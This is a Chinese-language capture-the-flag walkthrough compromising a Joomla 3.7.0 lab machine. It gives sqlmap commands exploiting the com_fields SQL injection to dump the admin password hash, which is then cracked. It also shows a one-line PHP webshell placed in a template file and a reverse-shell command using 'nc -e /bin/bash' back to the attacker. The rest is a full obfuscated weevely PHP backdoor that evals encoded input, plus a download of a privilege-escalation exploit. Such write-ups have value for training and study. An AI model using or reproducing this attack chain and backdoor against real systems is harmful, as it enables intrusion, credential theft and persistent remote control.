本机192.168.223.128
靶机192.168.223.139
目标发现nmap -sP 192.168.223.0/24
端口扫描nmap -p- 192.168.223.139
之开启了一个80端口
看一下是什么服务
nmap -sV -p- -A 192.168.223.139
是一个apache服务,joomla模板
看一下web
没什么有用信息。
扫描一下后台
dirsearch -u http://192.168.223.139/
有个administator可能是后台界面
看一下
joomla这个cms有个专门漏扫工具
joomscan --help
扫一下
没扫出来什么有用的信息
比较重要的就是这个版本3.7.0,搜一下看看有没有漏洞
看一下这个php文件
把里面的url改成目标机ip
不太管用,换个txt文件看看怎么个回事
看看这42033.txt,版本号完全一致
给了sqlmap的指令,把其中的url改一下
sqlmap -u "http://192.168.223.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]
爆出库名了
看一下当前库名
当前是joomladb
看一下表明
sqlmap -u "http://192.168.223.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --tables -D joomladb -p list[fullordering]
巨长的表,一般看users
sqlmap -u "http://192.168.223.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -T "#__users" -D joomladb -p list[fullordering] --columns
注意给表名加上双引号不然会被当成注释
这里字典就使用1
有账号密码
sqlmap -u "http://192.168.223.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dump -C username,password -T "#__users" -D joomladb -p list[fullordering]
admin $2y 10 10 10DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
john爆破一下密码
密码是snoopy
登上了
这里可以文件读取也可以文件上传
发现有个php文件,修改成一句话
注意目录是/templates/beez3/html/modules.php
成功rce
现在可以反弹shell
攻击机开个监听端口 nc -lvnp 4567
x=system(“nc -e /bin/bash 192.168.223.128 4567”);
发现弹不过来,不知道什么问题。。。(后来发现是靶机的nc 没有-e功能)
换个方法,用kali自带的传马工具weevely
先生成在一个马
weevely generate x /tmp/shell.php
把里面的内容复制到刚才那个modules.php里面
<?php
$K='$k="9dd4XAe461";$XAXAkhXA="268c8XA034f5c8XA";$kf="564e15XAXA5c67a6";$XAp="6obiXAXAcjYP3y0JgHXApI";funct';
$X=str_replace('B','','BcBrBeateB_fBBunction');
$c='XAioXAn x($t,$k){XA$c=stXArlXAen(XAXA$k);$l=strlen($tXA);$o="";fXAXAor($XAi=0;$i<$l;){for(XA$j=0;(';
$H='"XA/$khXA(.+)$XAkfXA/",XA@file_get_contentXAsXA("php://input"XAXA),$m)==1)XA {@ob_sXAtart()XA;@evX';
$n='Aal(@gzXAuncompreXAss(@XAx(@base6XA4_decode(XA$mXA[1XA]XA),$k)));$o=@ob_geXAt_conXAtentXAs();@ob_e';
$W='XAnXAd_clean();XA$r=@baseXA6XAXA4_encode(@x(@gzcomXApressXA($o),XAXAXA$k));priXAnt("$p$kh$r$kf");}';
$C='XAXA$j<$cXA&&$i<XA$lXA);$j++,$i++){$XAo.=$tXA{$i}^$XAk{XA$j};}}retuXAXArn $o;}iXAf (@preg_matchXA(';
$r=str_replace('XA','',$K.$c.$C.$H.$n.$W);
$i=$X('',$r);$i();
?>
然后连接 weevely http://192.168.223.139/templates/beez3/html/modules.php x
成功弹回shell
翻了一圈没找到可以利用的文件,看了别人的wp发现是Ubuntu这个版本有漏洞
lsb_release -a看一下自己的Ubuntu版本
搜一下版本漏洞
看其他人使用这个漏洞,看一下
下载一下exp
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
最后老失败,不知道为什么,晕,基本完成了…
